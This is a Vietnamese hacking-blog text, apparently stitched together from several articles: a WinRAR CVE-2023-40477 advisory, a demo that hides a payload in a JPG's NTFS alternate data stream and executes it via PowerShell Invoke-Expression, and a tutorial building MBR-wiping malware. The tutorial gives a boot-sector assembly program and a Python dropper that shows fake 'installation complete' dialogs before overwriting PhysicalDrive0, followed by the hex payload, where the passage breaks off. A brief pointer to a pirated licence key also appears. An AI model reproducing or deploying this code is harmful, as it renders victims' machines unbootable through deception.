Chặn mshta.exe, giám sát tiến trình đáng ngờ (như AutoIt.exe), hạn chế thực thi HTA, và áp dụng các cơ chế bảo vệ nâng cao như Application Whitelisting, AMSI Logging, và Behavioral Analysis.

Gần đây, một lỗ hổng bảo mật mới đã được tìm thấytrong WinRAR, có mã CVE-2023-40477, điểm CVSS là 7,8. Lỗ hổng này giúp Hacker tấn công từ xa thực thi mã lệnh tùy ý trên các máy tính có cài đặt WinRAR. Mã độc được đính kèm vào file nén có thể giành quyền kiểm soát máy tính nếu người dùng mở file nén từ winrar.

Nguyên nhân của vấn đề bắt nguồn từ việc thiếu xác thực dữ liệu do người dùng cung cấp. Việc xác thực lỏng lẻo này có thể dẫn đến một tình huống trong đó quyền truy cập bộ nhớ vượt quá bộ đệm đã được phân bổ cho khi nén file, tạo ra môi trường thuận lợi cho Hacker đính kèm mã độc vào file nén.

WinRAR đã nhanh chóng vá lỗ hổng nguy hiểm này ngay sau đó. Trong phiên bản mới nhất, WinRAR 6.23, lỗ hổng CVE-2023-40477 đã được vá thành công Người dùng cần nhanh chóng cập nhật lên phiên bản mới nhất để tránh trường hợp Hacker phát tán Virus qua file nén.

Để kiểm tra phiên bản Winrar đang sử dụng, bạn mở Winrar lên chọn Menu Help -> About

Kiểm tra phiên bản Winrar nếu thấp hơn 6.23 thì cần cập nhật lên bản cao nhất.

Để cập nhật Winrar, bạn tải phần mềm từ trang Web chính chủ rarlab.com để cài đăt.

Nếu muốn kích hoạt bản quyền vĩnh viển, có thể dùng Key trong bài viết này.

Nếu bạn không tin tưởng Winrar, có thể dùng phần mềm 7-Zip hoặc chờ Windows 11 nâng cấp tính năng nén và giải nén RAR, 7-Zip và GZ trong phiên bản cập nhật sắp tới.

Lưu ý: Bài viết chỉ dành cho mục đích giáo dục, nghiên cứu và học tập. Mọi hành vi liên quan đến pháp luật, Anonyviet sẽ không chịu trách nhiệm về mọi hành vi mà bạn gây ra ! 

Demo Hacker ẩn Virus vào hình ảnh và cách thực thi

Đầu tiên mình đã chuẩn bị sẵn một hình ảnh có tên là anonyviet.jpg, và một máy chủ Kali Linux để lưu trữ các mã độc. Bây giờ mình sử dụng lệnh curl để lấy để lấy “mã độc” có trong payload.txt. Trong payload.txt mình đã lưu trữ một dòng lệnh calc.exe .Đây là một câu lệnh đơn giản để mở Calculator trên hệ điều hành Windows.

Để nhúng calc.exe vào hình ảnh anonyviet.jpg mình đã thực hiện lệnh sau:

curl http://192.168.0.111:8000/payload.txt > anonyviet.jpg:payload

Câu lệnh trên sẽ thực hiện việc tải về nội dung từ URL “http://192.168.0.111:8000/payload.txt” và ghi nội dung đó vào tệp tin “anonyviet.jpg:payload”

Sau lệnh curl thực thi xong, chúng ta có thể thấy dung lượng hình ảnh không thay đổi nhưng khi bạn nhập lệnh dir /rthì các bạn có thể thấy 1 dữ liệu khác có tên là anonyviet.jpg:payload:$DATA

Mặc dù các bạn đã biết trong anonyviet.jpg:payload:$DATAcó chứa dữ liệu “calc.exe”, nhưng trong trường hợp khác. Giả sử nếu bạn thực thi 1 file virus.exe, con virus này nó thực thi câu lệnh curl giống như trên. Vậy làm sao để biết được mã độc dấu trong hình ảnh. Và đây là cách mình kiểm tra với lệnh bên dưới:

powershell -c "Get-Content .\anonyviet.jpg -Stream payload"

Câu lệnh trên được sử dụng để truy xuất dữ liệu từ một luồng dữ liệu (stream) đặc biệt trong tệp tin “anonyviet.jpg”. Để hiểu rõ hơn về lệnh này, mình sẽ giải thích từng phần cụ thể:

1. powershell: Đây là một chương trình dòng lệnh trong hệ điều hành Windows, cho phép thực thi các lệnh và tập lệnh (script) PowerShell.
2. -c: Đây là tùy chọn “command” trong PowerShell, cho phép bạn cung cấp một câu lệnh PowerShell trực tiếp từ dòng lệnh.
3. "Get-Content .\anonyviet.jpg -Stream payload": Đây là câu lệnh PowerShell được trích dẫn trong dấu ngoặc kép. Nó sẽ được thực thi bởi PowerShell khi bạn chạy câu lệnh đó.
   • Get-Content: Là một cmdlet (lệnh) trong PowerShell được sử dụng để đọc nội dung của tệp tin.
   • .\anonyviet.jpg: Là đường dẫn tới tệp tin “anonyviet.jpg” trong thư mục hiện tại
   • -Stream payload: Đây là tham số “payload” của lệnh Get-Content. Trong PowerShell, “-Stream” cho phép bạn đọc dữ liệu từ các luồng dữ liệu đặc biệt của tệp tin. Trong trường hợp này, mình đang truy xuất dữ liệu từ luồng “payload” trong tệp tin “anonyviet.jpg”

Như vậy các bạn có thể thấy “calc.exe” đã được in ra màn hình. Vậy làm cách nào để thực thi “calc.exe”, và đây là cách mình đã làm:

powershell -c "$opencalc = Get-Content .\anonyviet.jpg -Stream payload; Invoke-Expression $opencalc"

Mình đã gán một biến có tên $opencalcsau đó mình dùng lệnh Invoke-Expression $opencalc. Đây là câu lệnh PowerShell sử dụng cmdlet “Invoke-Expression” để thực thi dữ liệu được lưu trữ trong biến $opencalc như một câu lệnh PowerShell. Tức là nội dung đọc từ luồng “payload” trong tệp tin “anonyviet.jpg” sẽ được thực thi như một mã lệnh PowerShell

Như vậy các bạn có thể thấy “calc.exe” đã được thực thi thông qua hình ảnh. Và để thực tế hơn nữa, mình sẽ demo lại thực thi mã độc bằng hình ảnh + Bypass Antivirus. Mời các bạn xem video bên dưới:

Dưới đây là một số cách phòng chống Hacker ẩn Virus vào hình ảnh:

1. Giới hạn quyền truy cập vào PowerShell: Đảm bảo rằng người dùng cuối không có quyền truy cập vào PowerShell hoặc giới hạn quyền sử dụng PowerShell cho các người dùng chỉ cần sử dụng nó trong mục đích công việc cụ thể
2. Kiểm tra và cập nhật hệ thống: Đảm bảo hệ điều hành và phần mềm trên máy tính luôn được cập nhật bản vá bảo mật mới nhất. Các bản vá này giúp bảo vệ khỏi các lỗ hổng bảo mật mà hacker có thể tận dụng
3. Chỉ cài đặt phần mềm đáng tin cậy: Đảm bảo rằng chỉ cài đặt và sử dụng các ứng dụng và phần mềm đáng tin cậy từ các nguồn có nguồn gốc xác thực. Tránh tải xuống và chạy các phần mềm từ nguồn không rõ nguồn gốc
4. Sử dụng phần mềm chống mã độc: Cài đặt và duy trì một phần mềm diệt virus và phần mềm chống Virus hiệu quả để ngăn chặn các cuộc tấn công từ mã độc và phần mềm độc hại
5. Quản lý tường lửa và quyền hạn: Thiết lập tường lửa để kiểm soát các kết nối đến và ra khỏi hệ thống và hạn chế quyền hạn của người dùng, đặc biệt là đối với các tài khoản quản trị viên
6. Kiểm tra dữ liệu đầu vào: Trong ứng dụng của bạn, hãy kiểm tra và xác thực dữ liệu đầu vào của người dùng để tránh các cuộc tấn công thông qua các kỹ thuật nhập liệu không an toàn
7. Tạo sao lưu định kỳ: Đảm bảo sao lưu dữ liệu thường xuyên và lưu trữ nó ở một nơi an toàn để đảm bảo rằng bạn có khả năng khôi phục lại dữ liệu trong trường hợp bị Virus tấn công
8. Đào tạo người dùng: Tăng cường khả năng nhận diện các cuộc tấn công từ Virus và tư duy bảo mật cho người dùng của bạn để họ hiểu và phòng chống các mối nguy hiểm tiềm tàng
9. Kiểm tra các tệp tin hình ảnh và luồng dữ liệu: Sử dụng phần mềm chống mã độc để quét các tệp hình ảnh và các luồng dữ liệu trong các tệp tin để phát hiện và ngăn chặn các mã độc có thể ẩn trong hình ảnh

Như vậy mình đã demo lại cách mà hacker thực thi Virus thông qua hình ảnh. Mình thấy đây là một thủ thuật tinh vi và nguy hiểm có khả năng phát tán mã độc rất cao. Chúng ta đã khám phá cách mà hình ảnh có thể được sử dụng như một vũ khí trong tay của hacker để xâm nhập vào hệ thống và lây nhiễm các phần mềm độc hại vào máy tính của chúng ta. Từ việc giấu Virus vào hình ảnh cho đến việc thực thi Virus thông qua các luồng dữ liệu, các chiến thuật này đòi hỏi chúng ta phải tăng cường nhận thức và thực hiện các biện pháp phòng ngừa mạnh mẽ. Việc bảo mật thông tin và dữ liệu trong thời đại công nghệ số là một thách thức không hề nhỏ. Để bảo vệ bản thân trước những cuộc tấn công Virus thông qua hình ảnh, chúng ta cần kết hợp sự cảnh giác, kiến thức về các chiến thuật tấn công, và việc sử dụng các công cụ bảo mật đáng tin cậy. Việc duy trì hệ thống và phần mềm cập nhật thường xuyên, cùng việc hạn chế quyền truy cập và giám sát hoạt động mạng cũng là những yếu tố quan trọng để đảm bảo an toàn.

Bạn cũng có thể đọc thêm bài viết Khai thác lỗ hổng WinRAR để phát tán mã độc trên Windows 

Câu hỏi thường gặp

Làm thế nào hacker có thể ẩn mã độc trong hình ảnh?

Hacker có thể sử dụng các kỹ thuật như nhúng dữ liệu vào luồng dữ liệu ẩn của file ảnh (ví dụ: sử dụng “anonyviet.jpg:payload”). Mã độc này sau đó có thể được trích xuất và thực thi bằng các lệnh như PowerShell.

Tôi có thể phát hiện mã độc ẩn trong hình ảnh như thế nào?

Bạn có thể sử dụng các lệnh như powershell -c "Get-Content .\anonyviet.jpg -Stream payload" để kiểm tra xem có dữ liệu ẩn trong luồng “payload” của file ảnh hay không. Tuy nhiên, điều này đòi hỏi kiến thức kỹ thuật nhất định.

Làm thế nào để bảo vệ bản thân khỏi nguy cơ này?

Hãy cập nhật phần mềm diệt virus thường xuyên, chỉ tải xuống hình ảnh từ các nguồn đáng tin cậy và hạn chế quyền truy cập vào các công cụ mạnh mẽ như PowerShell nếu không cần thiết.

An0nyviet hy vọng rằng bài viết này sẽ giúp bạn hiểu rõ hơn về cách thức hoạt động của mã độc và cách bảo vệ chính mình khỏi nó. Mình sẽ chia sẻ cách tạo ra một phần mềm độc hại MBR. Trước khi vào vấn đề đó mình sẽ nói qua khái niệm về MBR và cách hoạt động của nó.

Lưu ý: Bài viết chỉ mang tính chất giáo dục, nghiên cứu về mã độc, vui lòng không thực hiện các cuộc tấn công phạm pháp nào. Anonyviet không chịu toàn bộ trách nhiệm mà bạn đã gây ra !

MBR là gì ? Cách hoạt động của MBR

MBR ( Master Boot Record: Bản ghi khởi động chính ), là một phần của đĩa cứng được sử dụng để khởi động hệ thống máy tính. Nó là một khối dữ liệu 512 byte đầu tiên trên ổ đĩa cứng được sử dụng để lưu trữ thông tin về cách phân vùng đĩa cứng và cách khởi động hệ thống. Trong MBR, có một bảng phân vùng chứa thông tin về các phân vùng trên đĩa cứng, bao gồm địa chỉ bắt đầu và kích thước của mỗi phân vùng. Nó cũng chứa mã khởi động ( bootloader ) để hệ thống có thể khởi động từ ổ đĩa cứng. Ngoài ra nó còn chứa một chữ ký ( signature ) với kích cỡ 2 byte ở cuối để xác nhận rằng nó là MBR hợp lệ và giúp hệ điều hành nhận diện đĩa cứng. Tuy nhiên, MBR cũng là điểm yếu của hệ thống bởi vì nó có thể bị tấn công bởi mã độc và phá hỏng thông tin về phân vùng và cách khởi động hệ thống, gây ra các vấn đề nghiêm trọng khi khởi động hệ thống.

Cách hoạt động của MBR: Khi hệ thống được bật, trình điều khiển BIOS (Basic Input/Output System) sẽ đọc MBR từ ổ đĩa cứng và tải nó vào bộ nhớ. Mã khởi động (bootloader) trong MBR sẽ được thực thi, cho phép hệ thống khởi động từ ổ đĩa cứng. Sau đó, Bootloader sẽ tải phần mềm khởi động tiếp theo (như GRUB hoặc NTLDR) và cho phép người dùng chọn hệ điều hành để khởi động. Nếu không có lựa chọn, bootloader sẽ tiếp tục thực thi và chuyển quyền điều khiển cho hệ điều hành. Nếu MBR bị hỏng hoặc bị tấn công bởi mã độc, bootloader có thể không thể được tải hoặc hệ thống sẽ không khởi động được. Trong trường hợp này, bạn cần phải sử dụng các công cụ phục hồi hệ thống để sửa chữa hoặc khôi phục lại MBR để đảm bảo hệ thống có thể khởi động được lại.

Mình đã tạo ra mã độc MBR phá hủy ổ cứng như thế nào ?

Để tạo ra được mã độc này, An0nyViet đã tìm hiểu những kiến thức sau:

• Ngôn ngữ lập trình Assembler: đây là một ngôn ngữ lập trình gần với ngôn ngữ máy và cung cấp một phương tiện để lập trình trực tiếp các lệnh máy tính. Nó cung cấp các lệnh khá đơn giản về việc thực hiện các tác vụ cơ bản như tính toán, lưu trữ và điều khiển và mình thường thấy các lập trình viên dùng ngôn ngữ này để viết ra các phần mềm yêu cầu xử lý tốc độ nhanh
• Qemu: là chương trình mô phỏng hệ thống (System Emulator) miễn phí và mã nguồn mở, cho phép người dùng chạy các hệ điều hành và phần mềm trong một môi trường ảo trên các nền tảng khác nhau. Nó mô phỏng một loạt các kiến trúc máy tính bao gồm các CPU phổ biến như x86, ARM, PowerPC, SPARC, và MIPS, cũng như các hệ điều hành như MacOS, Windows, và Linux
• Netwide Assembler:  viết tắt là “NASM” là một trình dịch ngược mã (Assembler) mã nguồn mở, được sử dụng để chuyển đổi mã assembly (ngôn ngữ lập trình gần với ngôn ngữ máy như mình đã nói ở trên) thành mã máy. NASM hỗ trợ nhiều kiến trúc máy tính, bao gồm các kiến trúc phổ biến như x86 và x86-64 (bao gồm cả 32-bit và 64-bit), ARM, PowerPC,…. Nó được sử dụng trong nhiều dự án phần mềm mã nguồn mở, bao gồm các hệ điều hành như Linux và FreeBSD, và các công cụ và ứng dụng như bootloader và các ứng dụng mã hóa.
• Ngôn ngữ lập trình Python: Đây là một ngôn ngữ lập trình khá nhiều anh em được biết và được học rồi nhỉ, được biết Python nổi tiếng về cú pháp đơn giản, dễ đọc, dễ hiểu, và dễ học. Hiện tại Python đang được phát triển và được dạy trong chương trình THPT. Python là ngôn ngữ lập trình thông dịch, được sử dụng rộng rãi trong nhiều lĩnh vực khác nhau.  Và đó cũng là lí do mình lựa chọn Python để viết ra mã độc MBR nhằm dễ đọc và dễ hiểu hơn

Trước tiên mình download Qemu Binaries và NASM. Việc cài đặt 2 phần mềm này khá đơn giản nên mình sẽ bỏ qua nhé. Bây giờ mình sẽ tiến hành tạo một tên tệp với bản định dạng của ngôn ngữ Assembler là .asm. Mình đặt tên file là boot.asm nhé

Bước 1: Tạo tệp boot.asm và biên dịch sang mã hex độc

org 0x7c00 
bits 16    


start:
    call cls 
    mov bx, display

print:
    mov al, [bx]
    cmp al, 0 
    je halt
    call print_char 
    inc bx
    jmp print 

print_char:
    mov ah, 0x0e
    int 0x10 
    ret 

halt:
    ret


cls:
    mov ah, 0x07   
    mov al, 0x00  
    mov bh, 0x02
    mov cx, 0x00  
    mov dx, 0x184f
    int 0x10       
    ret            

display db "We are Anonyviet.com, I am Hevin", 13, 10, "You have been hacked !", 13, 10, 0
times 510 - ($ - $$) db 0
dw 0xaa55 

Đoạn code trên là một chương trình boot loader, được tạo ra để chạy trên một máy tính x86 sau khi khởi động. Bây giờ chúng mình hãy cùng đi vào từng đoạn code để hiểu rõ hơn nha:

Dòng đầu tiên org 0x7c00 chỉ định vị trí lưu trữ của chương trình khi nó được nạp vào bộ nhớ, và địa chỉ này được xác định là 0x7c00. Dòng thứ 2 chính là bits 16 chỉ định rằng chương trình này sẽ được biên dịch và chạy trên kiến trúc 16Bit

org 0x7c00
bits 16

Chương trình bắt đầu bằng nhãn start và thực hiện các lệnh. Lệnh đầu tiên gọi hàm cls để xóa màn hình. Lệnh thứ hai đưa địa chỉ của chuỗi display vào thanh ghi bx

start:
     call cls
     mov bx, display

Đoạn mã này lặp lại cho đến khi kết thúc chuỗi display. Mỗi lần lặp lại, nó đọc một ký tự từ chuỗi display và gọi hàm print_char để in ký tự đó ra màn hình. Sau đó, nó tăng giá trị của thanh ghi bx để trỏ đến ký tự tiếp theo trong chuỗi display và lặp lại quá trình này.

print:
     mov al, [bx]
     cmp al, 0
     je halt
     call print_char
     inc bx
     jmp print

Hàm print_char đặt giá trị 0x0e vào thanh ghi ah, sau đó gọi trình ngắt 0x10 để hiển thị ký tự tương ứng với thanh ghi al lên màn hình. Tiếp đến, nó sẽ trả về ngay lập tức.

print_char:
     mov ah, 0x0e
     int 0x10
     ret

Hàm halt chỉ đơn giản là trả về ngay lập tức.

halt:
     ret

cls là một hàm để xóa màn hình
mov ah, 0x07: Di chuyển giá trị 0x07 vào thanh ghi ah, là mã hàm ẩn bảng ký tự của BIOS để xoá màn hình.
mov al, 0x00: Di chuyển giá trị 0x00 vào thanh ghi al, là thông số mặc định để xoá màn hình.
mov bh, 0x02: Di chuyển giá trị 0x02 vào thanh ghi bh, là mã màu sắc của ký tự trên màn hình console.Trong trường hợp này, màu sắc được chọn là màu xanh lá cây được biểu thị bằng mã nhị phân. Bạn có thể xem các danh sách màu chữ của BIOS tại đây
mov cx, 0x00: Di chuyển giá trị 0x00 vào thanh ghi cx, là số lần hiển thị để xoá màn hình.
mov dx, 0x184f: Di chuyển giá trị 0x184f vào thanh ghi dx, là tọa độ bắt đầu xoá màn hình với x = 0 và y =0
int 0x10: Gọi hàm ngắt số 0x10, là hàm giao tiếp với phần cứng video của máy tính.
ret: Trả về hàm và quay trở lại nơi gọi hàm.

cls:
     mov ah, 0x07
     mov al, 0x00
     mov bh, 0x02
     mov cx, 0x00
     mov dx, 0x184f
     int 0x10
     ret

display là tên biến, db là instruction để định nghĩa một chuỗi byte.
Chuỗi được định nghĩa bao gồm: "We are Anonyviet.com, I am Hevin", 13, 10, "You have been hacked !", 13, 10, 0 và bạn cũng có thể thay đổi lời nhắn tùy ý nhé !

Ở đây "We are Anonyviet.com, I am Hevin" là một chuỗi ký tự, trong trường hợp này là thông điệp được hiển thị trên màn hình

Còn 13 và 10 lần lượt là các ký tự ASCII tương ứng với các ký tự xuống dòng và lùi về đầu dòng (Carriage Return và Line Feed).
"You have been hacked !" là thông điệp tiếp theo được hiển thị trên màn hình. 0 là ký tự kết thúc chuỗi.
times 510 - ($ - $$) db 0 sử dụng lệnh times để bổ sung các byte giá trị 0 vào phần còn thiếu của boot sector (tính từ đầu cho tới vị trí 510).
dw 0xaa55 giá trị kết thúc của boot sector là 0xAA55, giá trị này sẽ được BIOS sử dụng để kiểm tra tính hợp lệ của boot sector trước khi nạp vào bộ nhớ và thực thi

display db "We are Anonyviet.com, I am Hevin", 13, 10, "You have been hacked !", 13, 10, 0
times 510 - ($ - $$) db 0
dw 0xaa55

Cách hoạt động của chương trình phá hủy MBR ổ cứng trên như sau:

Trước tiên, nó sử dụng lệnh org 0x7c00 để xác định địa chỉ bắt đầu của chương trình, tức là địa chỉ 0x7c00. Tiếp đến sử dụng bits 16 để chỉ định kiểu bit được sử dụng.

Sau đó, chương trình chạy đến nhãn start và gọi hàm cls để xóa màn hình và di chuyển con trỏ về địa chỉ đầu tiên của chuỗi display bằng cách di chuyển địa chỉ của chuỗi vào thanh ghi bx

Tiếp theo, chương trình sử dụng một vòng lặp để in từng ký tự trong chuỗi display bằng cách gọi hàm print_char. Nếu ký tự là ký tự null (0), vòng lặp sẽ dừng lại và chương trình sẽ gọi hàm halt để kết thúc chương trình. Nếu không, con trỏ sẽ được di chuyển sang ký tự tiếp theo trong chuỗi bằng cách tăng giá trị của thanh ghi bx và chương trình sẽ tiếp tục in ký tự tiếp theo.

Hàm print_char sử dụng lệnh int 0x10 để gọi dịch vụ hệ thống của BIOS để in một ký tự lên màn hình. Trong hàm này, chương trình truyền giá trị của thanh ghi al vào thanh ghi ah và sau đó gọi lệnh int 0x10 để in ký tự lên màn hình.

Hàm cls cũng sử dụng lệnh int 0x10 để gọi dịch vụ hệ thống của BIOS để xóa màn hình. Trong hàm này, chương trình thiết lập các thanh ghi để định dạng của việc xóa màn hình và sau đó gọi lệnh int 0x10 để xóa màn hình.

Cuối cùng, chương trình kết thúc bằng hai câu lệnh với  times 510 - ($ - $$) db 0 được sử dụng để đảm bảo rằng kích thước của chương trình sẽ là chính xác 512 byte và dw 0xaa55 được sử dụng để đánh dấu kí tự cuối của một sector bootable.

Để biên dịch được sang mã hex độc và thực thi nó mình đã làm như sau:

Giờ mình sẽ boot thử vào boot.bin bằng qemu binaries xem có được không nhé ! OK. Vậy là được rồi. Đầu tiên mình sẽ sử dụng NASM để biên dịch boot.asm sang boot.bin sau đó mình sẽ vào website tomeko.net để chuyển file boot.bin sang mã hex độc hại tiếp đến mình chỉ vệc copy lại

Ngoài ra bạn có thể sử dụng một đoạn script Python nhỏ của mình để chuyển file bin sang dạng mã hex nhé. Nếu bạn có tên file khác boot.bin bạn chỉ cần sửa ở dòng 3 sau đó chạy script, nó sẽ cấp cho bạn 1 đoạn mã hex giống như bên dưới

import binascii

with open("boot.bin", "rb") as f:
    binary_data = f.read()
hex_values = ["0x{:02X}".format(byte) for byte in binary_data]
print(hex_values)

hex_string = ", ".join(hex_values)
print(hex_string)

Bước 2: Đính kèm mã hex độc và biên dịch sang EXE

Đầu tiên mình sẽ viết ra 1 đoạn code Python ngắn gọn với module Pywin32 việc cài đặt module đó cũng khá đơn giản, bạn chỉ cần mở CMD trên máy sau đó chạy đoạn lệnh pip install pywin32.Với module này giúp mình làm việc với các tài nguyên Windows như các tệp, thư mục, tiến trình, ứng dụng, COM objects, registry, service,…Không chỉ vậy, nó còn thực hiện các tác vụ liên quan đến Windows, bao gồm cả việc sử dụng các API của Windows thông qua các đối tượng Python. Mình sẽ gọi các module con của Pywin32 bao gồm win32file, win32api, win32gui, win32ui và win32con và import tất cả những gì của module vào. Còn module time mình dùng để “thao túng tâm lý” nạn nhân thôi :>

Và bạn chỉ cần copy đoạn mã hex lúc nãy mà bạn đã tạo được và paste nó vào bến ma_doc như hình bên dưới

from win32file import * 
from win32api import *  
from win32gui import *  
from win32con import *  
from win32ui import *  
from time import sleep

ma_doc = bytes([
     # paste đoạn code dữ liệu hex tại đây

])

Sau khi đã copy mã độc vào biến ma_doc, chúng ta sẽ tạo 1 hàm tên là run_mbr() bao gồm các nội dung sau:

def run_mbr():
    while MessageBox('Bấm "Yes để tiếp tục cài đặt" ', 'Anonyviet',MB_YESNO) == IDNO:
            continue
    sleep(3)
    if MessageBox('Đã cài đặt hoàn tất \nVui lòng khởi động lại máy để phần mềm được làm mới !', "Anonyviet"):
        pass

    anonyviet = CreateFileW(r"\\.\PhysicalDrive0", 
                          GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 
                          None, OPEN_EXISTING, 0, 0)

    WriteFile(anonyviet, ma_doc, None)
    CloseHandle(anonyviet)

run_mbr()

Một vòng lặp while vô hạn được bắt đầu. Trong vòng lặp này, một hộp thoại MessageBox sẽ xuất hiện với một thông điệp yêu cầu người dùng bấm Yes hoặc No để tiếp tục cài đặt. Nếu người dùng bấm No, vòng lặp sẽ tiếp tục chạy và hộp thoại sẽ xuất hiện lại ( Và đây là kiểu ép buộc người dùng phải chọn Yes ), Nếu người dùng bấm Yes, vòng lặp sẽ kết thúc. Sau đó, chương trình sẽ dừng nghỉ trong 3 giây bằng hàm sleep(3) để đợi người dùng có thể đọc thông báo hoàn tất. Tiếp theo, một hộp thoại MessageBox khác xuất hiện với thông điệp yêu cầu người dùng khởi động lại máy tính để phần mềm được cập nhật. Nếu người dùng nhấn OK, chương trình sẽ tiếp tục thực thi bước tiếp theo. Với chuỗi đầu tiên trong MessageBox đó là Bấm "Yes" để tiếp tục cài đặt Đây là chuỗi hiện lên thông báo văn bản trên hộp thoại, tiếp đến đó là chuỗi 'Anonyviet' đây là chuỗi hiện thị tên hộp thoại và cuối cùng đó là MB_YESNO đây là một phương thức gọi hộp thoại YES NO của win32gui

Tiếp đến là mở một tập tin được gọi là \\.\PhysicalDrive0, là tệp tương ứng với ổ đĩa vật lý đầu tiên trên hệ thống. Điều này cho phép chương trình ghi một số dữ liệu lên phần MBR (Master Boot Record) của ổ đĩa. Dòng code bên dưới tạo một file handle (một đối tượng để truy cập file) cho thiết bị ổ đĩa vật lý đầu tiên (PhysicalDrive0) bằng cách sử dụng hàm CreateFileW của Windows API. Tham số GENERIC_WRITE chỉ định rằng file handle này sẽ được sử dụng để ghi dữ liệu vào ổ đĩa. Tham số FILE_SHARE_READ và FILE_SHARE_WRITE cho phép các tiến trình khác có thể đọc và ghi vào thiết bị. Tham số None chỉ định rằng không có thuộc tính bảo mật nào được sử dụng cho file handle. Tham số OPEN_EXISTING chỉ định rằng file handle được tạo sẽ trỏ tới một file đã tồn tại. Tham số cuối cùng là các flag khác và ở đây được đặt là 0.

với đoạn code bên dưới sử dụng hàm WriteFile() của Windows API để ghi dữ liệu được lưu trong biến ma_doc (chứa mã độc MBR) vào ổ đĩa vật lý đã được mở file handle (anonyviet). Tiếp đến là hàm CloseHandle()  hàm này đóng file handle (anonyviet) đã được mở trước đó. Việc đóng file handle giúp giải phóng tài nguyên và ngăn chặn việc các tiến trình khác ghi vào thiết bị.

Nói nôm na là chương trình này yêu cầu người dùng bấm Yes để tiếp tục cài đặt, sau đó dừng nghỉ trong 3 giây và hiển thị một thông báo yêu cầu khởi động lại máy tính để cập nhật phần mềm. Sau khi người dùng khởi động lại máy tính, chương trình ghi dữ liệu vào phần MBR của ổ đĩa vật lý đầu tiên trên hệ thống. Và đó chính là mã độc MBR

Đây là đoạn code Python hoàn thiện:

from win32file import * 
from win32api import *  
from win32gui import *  
from win32con import *  
from win32ui import *  
from time import sleep


ma_doc = bytes([
     # paste đoạn code dữ liệu hex tại đây
    0xE8, 0x15, 0x00, 0xBB, 0x27, 0x7C, 0x8A, 0x07, 0x3C, 0x00, 0x74, 0x0B, 0xE8, 0x03, 0x00, 0x43, 0xEB, 0xF4, 
    0xB4, 0x0E, 0xCD, 0x10, 0xC3, 0xC3, 0xB4, 0x07, 0xB0, 0x00, 0xB7, 0x02, 0xB9, 0x00, 0x00, 0xBA, 0x4F, 0x18, 
    0xCD, 0x10, 0xC3, 0x57, 0x65, 0x20, 0x61, 0x72, 0x65, 0x20, 0x41, 0x6E, 0x6F, 0x6E, 0x79, 0x76, 0x69, 0x65, 
    0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2C, 0x20, 0x49, 0x20, 0x61, 0x6D, 0x20, 0x48, 0x65, 0x76, 0x69, 0x6E, 0x0D, 
    0x0A, 0x59, 0x6F, 0x75, 0x20, 0x68, 0x61, 0x76, 0x65, 0x20, 0x62, 0x65, 0x65, 0x6E, 0x20, 0x68, 0x61, 0x63, 
    0x6B, 0x65, 0x64, 0x20, 0x21, 0x0D, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
